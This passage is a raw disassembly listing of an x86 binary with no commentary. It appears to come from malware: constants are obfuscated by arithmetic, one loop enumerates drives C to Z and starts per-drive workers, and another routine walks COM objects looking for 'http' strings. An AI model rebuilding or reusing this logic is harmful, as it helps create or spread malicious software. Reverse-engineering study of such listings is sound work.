loc_41A47F: ; CODE XREF: sub_41A433+2A�j
; sub_41A433+30�j
pop large dword ptr fs:0
add esp, 0Ch
pop edi
pop esi
pop ebx
retn
sub_41A433 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41A48D proc near ; CODE XREF: .data:0041A54E�p
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ebx
push esi
push edi
push ebp
push 0
push 0
push 10001098h
push [ebp+arg_0]
call sub_4250E1
pop ebp
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn
sub_41A48D endp
; ---------------------------------------------------------------------------
db 0FCh
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
sub esp, 8
push ebx
push esi
push edi
push ebp
mov ebx, [ebp+0Ch]
mov eax, [ebp+8]
test dword ptr [eax+4], 6
jnz loc_41A582
mov [ebp-8], eax
mov eax, [ebp+10h]
mov [ebp-4], eax
lea eax, [ebp-8]
mov [ebx-4], eax
mov esi, [ebx+0Ch]
mov edi, [ebx+8]
loc_41A4E0: ; CODE XREF: .data:0041A579�j
cmp esi, 0FFFFFFFFh
jz loc_41A591
lea ecx, [esi+esi*2]
cmp dword ptr [edi+ecx*4+4], 0
jz short loc_41A570
push esi
push ebp
lea ebp, [ebx+10h]
mov eax, [ebp-14h]
mov eax, [eax]
mov eax, [eax]
mov ds:10012034h, eax
mov edx, [ebp-14h]
mov eax, [edx]
mov ds:10012038h, eax
mov eax, [edx+4]
mov ds:1001203Ch, eax
push esi
push edi
push ecx
mov ecx, 14h
lea edi, ds:10012040h
mov esi, ds:10012038h
rep movsd
lea edi, ds:10012040h
mov ds:10012038h, edi
pop ecx
pop edi
pop esi
call dword ptr [edi+ecx*4+4]
pop ebp
pop esi
mov ebx, [ebp+0Ch]
or eax, eax
jz short loc_41A570
js short loc_41A57E
mov edi, [ebx+8]
push ebx
call sub_41A48D
add esp, 4
lea ebp, [ebx+10h]
push esi
push ebx
call sub_41A433
add esp, 8
lea ecx, [esi+esi*2]
mov eax, [edi+ecx*4]
mov eax, [ebx+0Ch]
call dword ptr [edi+ecx*4+8]
loc_41A570: ; CODE XREF: .data:0041A4F1�j
; .data:0041A546�j
mov edi, [ebx+8]
lea ecx, [esi+esi*2]
mov esi, [edi+ecx*4]
jmp loc_41A4E0
; ---------------------------------------------------------------------------
loc_41A57E: ; CODE XREF: .data:0041A548�j
xor eax, eax
jmp short loc_41A59B
; ---------------------------------------------------------------------------
loc_41A582: ; CODE XREF: .data:0041A4C5�j
push ebp
lea ebp, [ebx+10h]
push 0FFFFFFFFh
push ebx
call sub_41A433
add esp, 0Ch
loc_41A591: ; CODE XREF: .data:0041A4E3�j
push 0Bh
call sub_425129
add esp, 4
loc_41A59B: ; CODE XREF: .data:0041A580�j
pop ebp
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
push ebx
push esi
push edi
cmp dword ptr [ebp+0Ch], 1
jnz short loc_41A5B4
call sub_41A5D0
loc_41A5B4: ; CODE XREF: .data:0041A5AD�j
call sub_42506C
push dword ptr [ebp+10h]
push dword ptr [ebp+0Ch]
push dword ptr [ebp+8]
mov eax, ds:10012000h
call eax
pop edi
pop esi
pop ebx
leave
retn 0Ch
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41A5D0 proc near ; CODE XREF: .data:0041A5AF�p
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 0Ch
push edi
push 0
push 0FFFFFFF6h
call sub_4250F9
mov [ebp+var_8], eax
push 0
push 0FFFFFFF5h
call sub_4250F9
mov [ebp+var_4], eax
push 0
push 0FFFFFFF4h
call sub_4250F9
mov [ebp+var_C], eax
push 1001201Eh
push [ebp+var_8]
call sub_4250ED
mov ds:10012008h, eax
push 1001201Ch
push [ebp+var_4]
call sub_4250ED
mov ds:10012004h, eax
push 1001201Ch
push [ebp+var_C]
call sub_4250ED
add esp, 30h
mov ds:1001200Ch, eax
mov edi, ds:10012004h
or edi, edi
jz short loc_41A649
push 0
push edi
call sub_425135
add esp, 8
loc_41A649: ; CODE XREF: sub_41A5D0+6C�j
mov edi, ds:1001200Ch
or edi, edi
jz short loc_41A663
push 0
push edi
call sub_425135
add esp, 8
call sub_41A669
loc_41A663: ; CODE XREF: sub_41A5D0+81�j
pop edi
leave
retn
sub_41A5D0 endp
; ---------------------------------------------------------------------------
dw 9090h
db 90h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41A669 proc near ; CODE XREF: sub_41A5D0+8E�p
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 14h
push ebx
push esi
push edi
mov [ebp+var_C], 0
call sub_4250D5
mov ebx, eax
mov [ebp+var_10], ebx
jmp short loc_41A6A1
; ---------------------------------------------------------------------------
loc_41A685: ; CODE XREF: sub_41A669+3B�j
cmp byte ptr [ebx], 3Dh
jz short loc_41A68D
inc [ebp+var_C]
loc_41A68D: ; CODE XREF: sub_41A669+1F�j
mov edi, ebx
xor eax, eax
stc
sbb ecx, ecx
repne scasb
neg ecx
lea eax, [ecx-2]
mov edi, eax
inc edi
lea ebx, [ebx+edi]
loc_41A6A1: ; CODE XREF: sub_41A669+1A�j
cmp byte ptr [ebx], 0
jnz short loc_41A685
mov edi, [ebp+var_C]
inc edi
lea edi, ds:0[edi*4]
mov [ebp+var_14], edi
push [ebp+var_14]
call sub_42511D
pop ecx
mov [ebp+var_8], eax
mov ds:10012010h, eax
cmp [ebp+var_8], 0
jnz short loc_41A6CF
xor eax, eax
jmp short loc_41A72C
; ---------------------------------------------------------------------------
loc_41A6CF: ; CODE XREF: sub_41A669+60�j
mov ebx, [ebp+var_10]
jmp short loc_41A719
; ---------------------------------------------------------------------------
loc_41A6D4: ; CODE XREF: sub_41A669+B3�j
mov edi, ebx
xor eax, eax
stc
sbb ecx, ecx
repne scasb
neg ecx
lea eax, [ecx-2]
mov edi, eax
inc edi
mov [ebp+var_4], edi
cmp byte ptr [ebx], 3Dh
jz short loc_41A713
push [ebp+var_4]
call sub_42511D
pop ecx
mov esi, [ebp+var_8]
mov [esi], eax
or eax, eax
jnz short loc_41A701
jmp short loc_41A72C
; ---------------------------------------------------------------------------
loc_41A701: ; CODE XREF: sub_41A669+94�j
push ebx
mov edi, [ebp+var_8]
push dword ptr [edi]
call sub_425141
add esp, 8
add [ebp+var_8], 4
loc_41A713: ; CODE XREF: sub_41A669+82�j
mov edx, [ebp+var_4]
lea ebx, [ebx+edx]
loc_41A719: ; CODE XREF: sub_41A669+69�j
cmp byte ptr [ebx], 0
jnz short loc_41A6D4
mov edx, [ebp+var_8]
mov dword ptr [edx], 0
mov eax, 1
loc_41A72C: ; CODE XREF: sub_41A669+64�j
; sub_41A669+96�j
pop edi
pop esi
pop ebx
leave
retn
sub_41A669 endp
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
sub esp, 28h
push ebx
push esi
push edi
mov esi, 43h
jmp short loc_41A74A
; ---------------------------------------------------------------------------
loc_41A741: ; CODE XREF: .data:0041A74D�j
and dword ptr ds:10011790h[esi*4], 0
inc esi
loc_41A74A: ; CODE XREF: .data:0041A73F�j
cmp esi, 5Ah
jbe short loc_41A741
loc_41A74F: ; CODE XREF: .data:0041A8DB�j
mov edi, 43h
jmp loc_41A8B7
; ---------------------------------------------------------------------------
loc_41A759: ; CODE XREF: .data:0041A8BA�j
movsx eax, word ptr ds:100120F0h
sub eax, 5
push eax
call dword ptr ds:10011630h
push 100137D2h
call sub_41E33D
push edi
push eax
lea ebx, [ebp-0Eh]
push ebx
call dword ptr ds:10011634h
add esp, 14h
cmp dword ptr ds:10011790h[edi*4], 0
jz short loc_41A7CF
movsx eax, word ptr ds:100120A4h
add eax, ds:10012104h
sub eax, 7
mov [ebp-14h], eax
lea eax, [ebp-14h]
push eax
push dword ptr ds:10011790h[edi*4]
call dword ptr ds:1001164Ch
cmp dword ptr [ebp-14h], 103h
jz short loc_41A7CF
push dword ptr ds:10011790h[edi*4]
call dword ptr ds:10010650h
and dword ptr ds:10011790h[edi*4], 0
loc_41A7CF: ; CODE XREF: .data:0041A78B�j
; .data:0041A7B8�j
lea eax, [ebp-0Eh]
push eax
call dword ptr ds:10011664h
mov [ebp-4], eax
cmp eax, 3
jz short loc_41A80F
cmp eax, 4
jz short loc_41A80F
cmp eax, 2
jz short loc_41A80F
cmp dword ptr ds:10011790h[edi*4], 0
jz loc_41A8B6
movsx ebx, word ptr ds:100120A4h
sub ebx, 5
mov ds:1000E630h[edi*4], ebx
jmp loc_41A8B6
; ---------------------------------------------------------------------------
loc_41A80F: ; CODE XREF: .data:0041A7DF�j
; .data:0041A7E4�j ...
push 1
call dword ptr ds:1000D000h
lea eax, [ebp-24h]
push eax
lea eax, [ebp-20h]
push eax
lea eax, [ebp-1Ch]
push eax
lea eax, [ebp-18h]
push eax
lea eax, [ebp-0Eh]
push eax
call dword ptr ds:1000E0D4h
movsx ebx, word ptr ds:100120F4h
add ebx, ds:1001209Ch
sub ebx, 3
cmp eax, ebx
jnz short loc_41A868
cmp dword ptr ds:10011790h[edi*4], 0
jz short loc_41A8B6
movsx ebx, word ptr ds:1001213Ch
add ebx, ds:100120A8h
sub ebx, 0Bh
mov ds:1000E630h[edi*4], ebx
jmp short loc_41A8B6
; ---------------------------------------------------------------------------
loc_41A868: ; CODE XREF: .data:0041A843�j
cmp dword ptr ds:10011790h[edi*4], 0
jnz short loc_41A8B6
mov ds:1000E630h[edi*4], edi
lea eax, [ebp-28h]
push eax
mov eax, ds:100120F8h
sub eax, 7
push eax
lea ebx, ds:1000E630h[edi*4]
push ebx
push 10008CEAh
movsx ebx, word ptr ds:10012118h
movsx edx, word ptr ds:100120F0h
add ebx, edx
sub ebx, 0Eh
push ebx
push 0
call dword ptr ds:10011B90h
mov ds:10011790h[edi*4], eax
loc_41A8B6: ; CODE XREF: .data:0041A7F3�j
; .data:0041A80A�j ...
inc edi
loc_41A8B7: ; CODE XREF: .data:0041A754�j
cmp edi, 5Ah
jbe loc_41A759
movsx eax, word ptr ds:100120B4h
movsx edx, word ptr ds:10012108h
add eax, edx
sub eax, 0Ah
push eax
call dword ptr ds:10011630h
pop ecx
jmp loc_41A74F
; ---------------------------------------------------------------------------
dd 0C95B5E5Fh
db 0C2h, 4, 0
; =============== S U B R O U T I N E =======================================
sub_41A8E7 proc near ; CODE XREF: .data:0041F941�p
push 2
call sub_41C6F2
push 0
call sub_41C6F2
add esp, 8
retn
sub_41A8E7 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41A8F9 proc near ; CODE XREF: sub_420BEA+20�p
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push 4
push 1000h
push [ebp+arg_0]
push 0
call dword ptr ds:1000F248h
pop ebp
retn
sub_41A8F9 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41A910 proc near ; CODE XREF: .data:0041CFD4�p
var_71F0E = byte ptr -71F0Eh
var_71F0C = dword ptr -71F0Ch
var_71F07 = byte ptr -71F07h
var_70F08 = word ptr -70F08h
var_70F00 = dword ptr -70F00h
var_70EF8 = dword ptr -70EF8h
var_70EF4 = dword ptr -70EF4h
var_70EEF = byte ptr -70EEFh
var_60EF0 = word ptr -60EF0h
var_60EE8 = dword ptr -60EE8h
var_60EDD = byte ptr -60EDDh
var_60EDC = dword ptr -60EDCh
var_60ED8 = dword ptr -60ED8h
var_60ED4 = dword ptr -60ED4h
var_60ED0 = word ptr -60ED0h
var_60EC8 = dword ptr -60EC8h
var_60EC0 = dword ptr -60EC0h
var_60EBC = dword ptr -60EBCh
var_60EB8 = dword ptr -60EB8h
var_60EB4 = dword ptr -60EB4h
var_60EB0 = dword ptr -60EB0h
var_60EAC = dword ptr -60EACh
var_60EA8 = dword ptr -60EA8h
var_60EA4 = dword ptr -60EA4h
var_60E9F = byte ptr -60E9Fh
var_50E9F = byte ptr -50E9Fh
var_50E9B = byte ptr -50E9Bh
var_40EB8 = byte ptr -40EB8h
var_40EB0 = dword ptr -40EB0h
var_40EA8 = word ptr -40EA8h
var_40EA0 = dword ptr -40EA0h
var_40E9C = dword ptr -40E9Ch
var_40E98 = dword ptr -40E98h
var_40E94 = byte ptr -40E94h
var_40E90 = dword ptr -40E90h
var_40E8C = dword ptr -40E8Ch
var_40E88 = dword ptr -40E88h
var_40E84 = dword ptr -40E84h
var_40E80 = byte ptr -40E80h
var_40E78 = dword ptr -40E78h
var_40E70 = dword ptr -40E70h
var_40E6C = dword ptr -40E6Ch
var_40E68 = dword ptr -40E68h
var_40E64 = dword ptr -40E64h
var_40E60 = dword ptr -40E60h
var_40E5C = dword ptr -40E5Ch
var_40E57 = byte ptr -40E57h
var_40E56 = byte ptr -40E56h
var_40E55 = byte ptr -40E55h
var_40E54 = byte ptr -40E54h
var_30E58 = dword ptr -30E58h
var_30E54 = dword ptr -30E54h
var_30E50 = dword ptr -30E50h
var_30E4C = dword ptr -30E4Ch
var_30E48 = dword ptr -30E48h
var_30E44 = dword ptr -30E44h
var_30E3F = byte ptr -30E3Fh
var_30D40 = byte ptr -30D40h
arg_0 = dword ptr 8
push ebp
mov ebp, esp
mov eax, 71F10h
call sub_42507D
push ebx
push esi
push edi
lea eax, [ebp+var_40E80]
push eax
call dword ptr ds:1000C038h
lea eax, [ebp+var_40E94]
push eax
lea eax, [ebp+var_40E80]
push eax
push 9
push dword ptr ds:100120ECh
push [ebp+arg_0]
call dword ptr ds:1000F254h
mov ebx, eax
mov eax, ds:100120C4h
movsx edx, word ptr ds:100120A0h
add eax, edx
sub eax, 9
cmp ebx, eax
jnz loc_41B6E7
mov eax, [ebp+var_40E78]
mov [ebp+var_40E64], eax
and [ebp+var_40E60], 0
lea eax, [ebp+var_40E60]
push eax
push 10013900h
mov eax, [ebp+var_40E64]
push eax
mov edi, [eax]
call dword ptr ds:0[edi]
mov ebx, eax
mov eax, ds:10012144h
movsx edx, word ptr ds:10012120h
add eax, edx
sub eax, 8
cmp ebx, eax
jnz loc_41B6E7
lea eax, [ebp+var_40E84]
push eax
mov eax, [ebp+var_40E60]
push eax
mov edi, [eax]
call dword ptr [edi+78h]
mov ebx, eax
movsx eax, word ptr ds:10012118h
movsx edx, word ptr ds:100120E0h
add eax, edx
sub eax, 11h
cmp ebx, eax
jnz loc_41B6DB
lea eax, [ebp+var_40E57]
push eax
push [ebp+var_40E84]
call sub_41CA6C
add esp, 8
mov edi, eax
inc edi
mov [ebp+var_40E98], edi
push [ebp+var_40E84]
call dword ptr ds:10011BA0h
cmp [ebp+var_40E57], 68h
jnz short loc_41AA2F
cmp [ebp+var_40E56], 74h
jnz short loc_41AA2F
cmp [ebp+var_40E55], 74h
jnz short loc_41AA2F
cmp [ebp+var_40E54], 70h
jz short loc_41AA34
loc_41AA2F: ; CODE XREF: sub_41A910+102�j
; sub_41A910+10B�j ...
jmp loc_41B6DB
; ---------------------------------------------------------------------------
loc_41AA34: ; CODE XREF: sub_41A910+11D�j
lea eax, [ebp+var_30E4C]
push eax
mov eax, [ebp+var_40E60]
push eax
mov edi, [eax]
call dword ptr [edi+94h]
mov ebx, eax
mov eax, ds:100120B0h
movsx edx, word ptr ds:1001214Ch
add eax, edx
sub eax, 9
cmp ebx, eax
jz short loc_41AA68
and [ebp+var_30E4C], 0
loc_41AA68: ; CODE XREF: sub_41A910+14F�j
lea eax, [ebp+var_40E68]
push eax
mov eax, [ebp+var_40E60]
push eax
mov edi, [eax]
call dword ptr [edi+48h]
mov ebx, eax
mov eax, ds:10012144h
add eax, ds:100120D0h
cmp ebx, eax
jnz loc_41B6DB
lea eax, [ebp+var_40E6C]
push eax
push 10013880h
mov eax, [ebp+var_40E68]
push eax
mov edi, [eax]
call dword ptr ds:0[edi]
mov ebx, eax
movsx eax, word ptr ds:1001211Ch
add eax, ds:100120FCh
sub eax, 5
cmp ebx, eax
jnz loc_41B6CF
lea eax, [ebp+var_40E70]
push eax
mov eax, [ebp+var_40E6C]
push eax
mov edi, [eax]
call dword ptr [edi+5Ch]
mov ebx, eax
mov eax, ds:10012138h
sub eax, 2
cmp ebx, eax
jnz loc_41B6C3
lea eax, [ebp+var_40E90]
push eax
mov eax, [ebp+var_40E70]
push eax
mov edi, [eax]
call dword ptr [edi+20h]
mov ebx, eax
mov eax, ds:100120D4h
movsx edx, word ptr ds:100120E0h
add eax, edx
sub eax, 8
cmp ebx, eax
jnz loc_41B6B7
mov eax, ds:100120A8h
sub eax, 3
neg eax
mov [ebp+var_40E5C], eax
push 100137C0h
call sub_422C45
push eax
call dword ptr ds:1000C044h
mov [ebp+var_30E44], eax
push 100137B0h
call sub_422C45
add esp, 8
push eax
call dword ptr ds:1000C044h
mov [ebp+var_30E48], eax
lea eax, [ebp+var_40E57]
push eax
lea eax, [ebp+var_30D40]
push eax
call sub_42509D
loc_41AB6D: ; CODE XREF: sub_41A910+D7B�j
and [ebp+var_40E88], 0
and [ebp+var_40E8C], 0
movsx eax, word ptr ds:10012118h
sub eax, 8
neg eax
cmp [ebp+var_40E5C], eax
jnz short loc_41ABD4
lea eax, [ebp+var_30E54]
push eax
mov eax, [ebp+var_40E6C]
push eax
mov edi, [eax]
call dword ptr [edi+38h]
mov ebx, eax
mov eax, ds:100120F8h
sub eax, 7
cmp ebx, eax
jnz loc_41B679
push 1001379Fh
call sub_41E33D
push eax
lea edi, [ebp+var_30D40]
push edi
call dword ptr ds:1000C020h
add esp, 0Ch
jmp loc_41ACE0
; ---------------------------------------------------------------------------
loc_41ABD4: ; CODE XREF: sub_41A910+27D�j
mov [ebp+var_40EA8], 17h
mov eax, [ebp+var_40E5C]
mov [ebp+var_40EA0], eax
lea eax, [ebp+var_40EB8]
push eax
lea eax, [ebp+var_40EA8]
push eax
mov eax, [ebp+var_40E70]
push eax
mov esi, [eax]
call dword ptr [esi+1Ch]
lea eax, [ebp+var_40E88]
push eax
push 100138D0h
push [ebp+var_40EB0]
mov edi, [ebp+var_40EB0]
mov edi, [edi]
call dword ptr ds:0[edi]
mov ebx, eax
movsx eax, word ptr ds:10012090h
sub eax, 2
cmp ebx, eax
jnz loc_41B679
lea eax, [ebp+var_40E8C]
push eax
mov eax, [ebp+var_40E88]
push eax
mov edi, [eax]
call dword ptr [edi+0D0h]
mov ebx, eax
mov eax, ds:10012134h
sub eax, 4
cmp ebx, eax
jz short loc_41AC6D
mov eax, [ebp+var_40E88]
push eax
mov esi, [eax]
call dword ptr [esi+8]
jmp loc_41B679
; ---------------------------------------------------------------------------
loc_41AC6D: ; CODE XREF: sub_41A910+34A�j
lea eax, [ebp+var_30E54]
push eax
mov eax, [ebp+var_40E8C]
push eax
mov edi, [eax]
call dword ptr [edi+38h]
mov ebx, eax
mov eax, ds:100120D8h
sub eax, 3
cmp ebx, eax
jz short loc_41ACAB
mov eax, [ebp+var_40E8C]
push eax
mov esi, [eax]
call dword ptr [esi+8]
mov eax, [ebp+var_40E88]
push eax
mov esi, [eax]
call dword ptr [esi+8]
jmp loc_41B679
; ---------------------------------------------------------------------------
loc_41ACAB: ; CODE XREF: sub_41A910+37C�j
push 10013790h
call sub_41E33D
push [ebp+var_40E5C]
push eax
lea edi, [ebp+var_30E3F]
push edi
call dword ptr ds:10011634h
lea eax, [ebp+var_30E3F]
push eax
lea eax, [ebp+var_30D40]
push eax
call dword ptr ds:1000C020h
add esp, 18h
loc_41ACE0: ; CODE XREF: sub_41A910+2BF�j
lea eax, [ebp+var_30E58]
push eax
mov eax, [ebp+var_30E54]
push eax
mov edi, [eax]
call dword ptr [edi+24h]
mov ebx, eax
mov eax, ds:1001210Ch
movsx edx, word ptr ds:10012130h
add eax, edx
sub eax, 7
cmp ebx, eax
jnz loc_41B679
mov eax, ds:100120D4h
movsx edx, word ptr ds:100120F0h
add eax, edx
sub eax, 5
mov [ebp+var_30E50], eax
jmp loc_41B667
; ---------------------------------------------------------------------------
loc_41AD2A: ; CODE XREF: sub_41A910+D63�j
mov [ebp+var_60ED0], 2
mov eax, [ebp+var_30E50]
mov [ebp+var_60EC8], eax
mov eax, ds:10012094h
movsx edx, word ptr ds:10012130h
add eax, edx
mov edx, ds:1001209Ch
add edx, ds:10012144h
sub edx, 3
mov [ebp+eax+var_50E9F], dl
lea eax, [ebp+var_60EC0]
push eax
lea esi, [ebp+var_60ED0]
sub esp, 10h
mov edi, esp
mov ecx, 4
rep movsd
lea esi, [ebp+var_60ED0]
sub esp, 10h
mov edi, esp
mov ecx, 4
rep movsd
mov edi, [ebp+var_30E54]
push edi
mov edi, [edi]
call dword ptr [edi+2Ch]
mov ebx, eax
mov eax, ds:100120C4h
sub eax, 4
cmp ebx, eax
jnz loc_41B661
push 10013782h
call sub_41E33D
push [ebp+var_30E50]
push eax
lea edi, [ebp+var_30E3F]
push edi
call dword ptr ds:10011634h
lea eax, [ebp+var_30E3F]
push eax
lea eax, [ebp+var_30D40]
push eax
call dword ptr ds:1000C020h
add esp, 18h
and [ebp+var_60ED4], 0
lea eax, [ebp+var_60ED4]
push eax
push 10013890h
mov eax, [ebp+var_60EC0]
push eax
mov edi, [eax]
call dword ptr ds:0[edi]
mov ebx, eax
mov eax, ds:10012148h
sub eax, 2
cmp ebx, eax
jnz loc_41B2EA
lea eax, [ebp+var_60ED8]
push eax
mov eax, [ebp+var_60ED4]
push eax
mov edi, [eax]
call dword ptr [edi+0F0h]
mov ebx, eax
mov eax, ds:10012148h
add eax, ds:10012098h
sub eax, 7
cmp ebx, eax
jnz loc_41B2DE
lea eax, [ebp+var_60E9F]
push eax
push [ebp+var_60ED8]
call sub_41CA6C
add esp, 8
mov edi, eax
inc edi
mov [ebp+var_60EB8], edi
push [ebp+var_60ED8]
call dword ptr ds:10011BA0h
movsx eax, word ptr ds:10012130h
movsx edx, word ptr ds:1001213Ch
add eax, edx
sub eax, 0Bh
mov [ebp+var_40E9C], eax
jmp short loc_41AED0
; ---------------------------------------------------------------------------
loc_41AE89: ; CODE XREF: sub_41A910+5CC�j
mov eax, [ebp+var_40E9C]
movsx eax, [ebp+eax+var_60E9F]
mov edx, ds:100120FCh
add edx, 0Ah
cmp eax, edx
jz short loc_41AEB7
mov edx, ds:10012134h
add edx, 4
add edx, ds:100120ACh
cmp eax, edx
jnz short loc_41AECA
loc_41AEB7: ; CODE XREF: sub_41A910+592�j
mov eax, [ebp+var_40E9C]
mov edx, ds:100120D4h
mov [ebp+eax+var_60E9F], dl
loc_41AECA: ; CODE XREF: sub_41A910+5A5�j
inc [ebp+var_40E9C]
loc_41AED0: ; CODE XREF: sub_41A910+577�j
mov eax, [ebp+var_60EB8]
cmp [ebp+var_40E9C], eax
jb short loc_41AE89
lea eax, [ebp+var_60E9F]
push eax
lea eax, [ebp+var_50E9B]
push eax
call sub_42509D
mov eax, ds:100120D8h
sub eax, 3
mov [ebp+var_40E9C], eax
loc_41AEFF: ; CODE XREF: sub_41A910+73A�j
mov eax, [ebp+var_40E9C]
lea ecx, [ebp+eax+var_60E9F]
or eax, 0FFFFFFFFh
loc_41AF0F: ; CODE XREF: sub_41A910+604�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_41AF0F
mov [ebp+var_60EA8], eax
mov edx, ds:10012110h
sub edx, 8
cmp eax, edx
jz short loc_41AF39
mov edx, ds:100120B0h
add edx, 0C3h
cmp eax, edx
jbe short loc_41AF3E
loc_41AF39: ; CODE XREF: sub_41A910+617�j
jmp loc_41B01E
; ---------------------------------------------------------------------------
loc_41AF3E: ; CODE XREF: sub_41A910+627�j
movsx eax, word ptr ds:10012130h
add eax, ds:1001209Ch
sub eax, 7
mov [ebp+var_60EA4], eax
jmp short loc_41AF7E
; ---------------------------------------------------------------------------
loc_41AF56: ; CODE XREF: sub_41A910+67A�j
mov eax, [ebp+var_40E9C]
add eax, [ebp+var_60EA4]
movsx eax, [ebp+eax+var_60E9F]
movsx edx, word ptr ds:100120F4h
add edx, 20h
cmp eax, edx
jnz short loc_41AF8C
inc [ebp+var_60EA4]
loc_41AF7E: ; CODE XREF: sub_41A910+644�j
mov eax, [ebp+var_60EA8]
cmp [ebp+var_60EA4], eax
jb short loc_41AF56
loc_41AF8C: ; CODE XREF: sub_41A910+666�j
mov eax, [ebp+var_60EA8]
cmp [ebp+var_60EA4], eax
jz loc_41B01E
mov eax, ds:10012144h
add eax, ds:100120C8h
sub eax, 3
push eax
mov eax, [ebp+var_40E9C]
lea eax, [ebp+eax+var_60E9F]
push eax
lea eax, [ebp+var_50E9B]
push eax
call sub_41FCE7
add esp, 0Ch
mov [ebp+var_60EDC], eax
mov eax, ds:100120D0h
add eax, 0FFFEh
add eax, ds:100120BCh
cmp [ebp+var_60EDC], eax
jnz short loc_41B01E
push 1001377Dh
call sub_41E33D
push eax
lea edi, [ebp+var_50E9B]
push edi
call dword ptr ds:1000C020h
mov eax, [ebp+var_40E9C]
lea eax, [ebp+eax+var_60E9F]
push eax
lea eax, [ebp+var_50E9B]
push eax
call dword ptr ds:1000C020h
add esp, 14h
loc_41B01E: ; CODE XREF: sub_41A910:loc_41AF39�j
; sub_41A910+688�j ...
mov eax, [ebp+var_60EA8]
mov edx, ds:10012100h
movsx ecx, word ptr ds:10012130h
add edx, ecx
sub edx, 6
add eax, edx
add [ebp+var_40E9C], eax
mov eax, [ebp+var_60EB8]
cmp [ebp+var_40E9C], eax
jb loc_41AEFF
mov eax, ds:100120D4h
add eax, ds:10012110h
sub eax, 8
mov [ebp+var_60EB4], eax
lea ecx, [ebp+var_50E9B]
or eax, 0FFFFFFFFh
loc_41B06D: ; CODE XREF: sub_41A910+762�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_41B06D
mov [ebp+var_60EA8], eax
mov eax, ds:10012138h
movsx edx, word ptr ds:1001211Ch
add eax, edx
sub eax, 4
mov [ebp+var_40E9C], eax
jmp loc_41B2AF
; ---------------------------------------------------------------------------
loc_41B096: ; CODE XREF: sub_41A910+9AB�j
mov eax, [ebp+var_40E9C]
movzx eax, [ebp+eax+var_50E9B]
mov edx, ds:100120A8h
add edx, 17h
add edx, ds:10012098h
cmp eax, edx
jz short loc_41B0BE
and [ebp+var_60EAC], 0
loc_41B0BE: ; CODE XREF: sub_41A910+7A5�j
mov eax, [ebp+var_40E9C]
movzx eax, [ebp+eax+var_50E9B]
movsx edx, word ptr ds:100120F0h
add edx, 1Bh
cmp eax, edx
jnz loc_41B25B
mov eax, ds:100120FCh
sub eax, 3
cmp [ebp+var_40E9C], eax
jbe loc_41B1B0
mov eax, [ebp+var_40E9C]
movsx edx, word ptr ds:10012120h
add edx, ds:100120C8h
sub edx, 0Bh
sub eax, edx
mov al, [ebp+eax+var_50E9B]
mov [ebp+var_60EDD], al
movzx eax, [ebp+var_60EDD]
movsx edx, word ptr ds:10012118h
add edx, 17h
cmp eax, edx
jle short loc_41B142
mov edx, ds:100120C0h
add edx, 28h
movsx ecx, word ptr ds:100120A4h
add edx, ecx
cmp eax, edx
jl short loc_41B1A6
loc_41B142: ; CODE XREF: sub_41A910+81A�j
movzx eax, [ebp+var_60EDD]
movsx edx, word ptr ds:100120F4h
movsx ecx, word ptr ds:10012120h
lea edx, [edx+ecx+31h]
cmp eax, edx
jle short loc_41B175
mov edx, ds:100120A8h
add edx, 36h
movsx ecx, word ptr ds:100120CCh
add edx, ecx
cmp eax, edx
jl short loc_41B1A6
loc_41B175: ; CODE XREF: sub_41A910+84D�j
movzx eax, [ebp+var_60EDD]
movsx edx, word ptr ds:100120A4h
mov ecx, ds:10012124h
lea edx, [edx+ecx+73h]
cmp eax, edx
jle short loc_41B1B0
movsx edx, word ptr ds:1001211Ch
mov ecx, ds:10012110h
lea edx, [edx+ecx+75h]
cmp eax, edx
jge short loc_41B1B0
loc_41B1A6: ; CODE XREF: sub_41A910+830�j
; sub_41A910+863�j
mov [ebp+var_60EAC], 1
loc_41B1B0: ; CODE XREF: sub_41A910+7DC�j
; sub_41A910+87F�j ...
mov eax, [ebp+var_60EA8]
cmp [ebp+var_40E9C], eax
jnb loc_41B25B
mov eax, [ebp+var_40E9C]
mov edx, ds:10012128h
inc edx
add eax, edx
mov al, [ebp+eax+var_50E9B]
mov [ebp+var_60EDD], al
movzx eax, [ebp+var_60EDD]
mov edx, ds:100120A8h
add edx, 1Ch
cmp eax, edx
jle short loc_41B1FF
mov edx, ds:10012104h
add edx, 2Eh
cmp eax, edx
jl short loc_41B251
loc_41B1FF: ; CODE XREF: sub_41A910+8E0�j
movzx eax, [ebp+var_60EDD]
mov edx, ds:100120D0h
add edx, 36h
add edx, ds:100120FCh
cmp eax, edx
jle short loc_41B227
movsx edx, word ptr ds:100120A4h
add edx, 3Ch
cmp eax, edx
jl short loc_41B251
loc_41B227: ; CODE XREF: sub_41A910+907�j
movzx eax, [ebp+var_60EDD]
movsx edx, word ptr ds:1001211Ch
mov ecx, ds:100120F8h
lea edx, [edx+ecx+71h]
cmp eax, edx
jle short loc_41B25B
mov edx, ds:100120A8h
lea edx, [edx+edx+77h]
cmp eax, edx
jge short loc_41B25B
loc_41B251: ; CODE XREF: sub_41A910+8ED�j
; sub_41A910+915�j
mov [ebp+var_60EAC], 1
loc_41B25B: ; CODE XREF: sub_41A910+7C8�j
; sub_41A910+8AC�j ...
cmp [ebp+var_60EAC], 0
jnz short loc_41B284
mov eax, [ebp+var_60EB4]
mov edx, [ebp+var_40E9C]
mov dl, [ebp+edx+var_50E9B]
mov [ebp+eax+var_50E9B], dl
inc [ebp+var_60EB4]
loc_41B284: ; CODE XREF: sub_41A910+952�j
mov eax, [ebp+var_40E9C]
